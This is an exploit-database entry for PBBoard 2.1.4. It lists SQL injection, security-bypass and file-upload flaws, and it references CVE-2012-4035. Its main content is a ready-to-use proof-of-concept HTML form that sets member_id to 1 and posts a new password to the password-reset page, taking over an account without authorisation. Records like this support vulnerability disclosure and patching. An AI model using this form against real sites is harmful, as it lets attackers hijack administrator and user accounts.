Lucene search
High-Tech BridgeEDB-ID:37615HistoryAug 08, 2012 - 12:00 a.m.
PBBoard - 'member_id' Validation Password Manipulation
2012-08-0800:00:00
High-Tech Bridge
www.exploit-db.com
22
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/54916/info
PBBoard is prone to multiple security vulnerabilities including:
1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability
Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.
PBBoard 2.1.4 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/index.php?page=new_password&forget=1" method="post" name="main" id="main">
<input type="hidden" name="member_id" value="1">
<input type="hidden" name="new_password" value="new_password">
<input type="submit" name="Submit" value="Send">
</form>Related
cvelist
cvelist
CVE-2012-4035
2012-08-12 00:00:00
cve
cve
CVE-2012-4035
2012-08-12 00:55:01
prion
prion
Default credentials
2012-08-12 00:55:00
nvd
nvd
CVE-2012-4035
2012-08-12 00:55:01
htbridge
htbridge
Multiple vulnerabilities in PBBoard
2012-07-18 00:00:00
securityvulns
securityvulns
Multiple vulnerabilities in PBBoard
2012-08-13 00:00:00
zdt
zdt
packetstorm
packetstorm